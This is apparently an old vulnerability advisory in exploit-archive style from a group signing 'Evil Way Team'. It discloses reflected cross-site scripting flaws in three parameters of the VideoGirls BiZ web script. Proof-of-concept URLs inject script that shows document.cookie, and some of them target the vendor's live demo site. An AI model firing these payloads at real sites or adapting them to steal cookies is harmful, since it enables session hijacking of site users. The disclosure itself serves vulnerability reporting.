/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
VideoGirls BiZ Remote XSS Vulnerabilities
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.videogirls.biz/
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php
*/
[+] Exploit XSS:
- Vulnerable code in forum.php (t)
- Vulnerable code in profile.php (profile_name)
- Vulnerable code in view.php (p)
- Poc:
http://127.0.0.1/forum.php?ftid=2&t=[XSS]
http://127.0.0.1/profile.php?profile_name=[XSS]
http://127.0.0.1/view.php?p=[XSS]
http://www.videogirls.biz/demo/forum.php?ftid=2&t="><script>alert(document.cookie);</script>
http://www.videogirls.biz/demo/profile.php?profile_name="><script>alert(document.cookie);</script>
http://www.videogirls.biz/demo/view.php?p="><script>alert(document.cookie);</script>
Note: have somes other xss, tired to do all ^^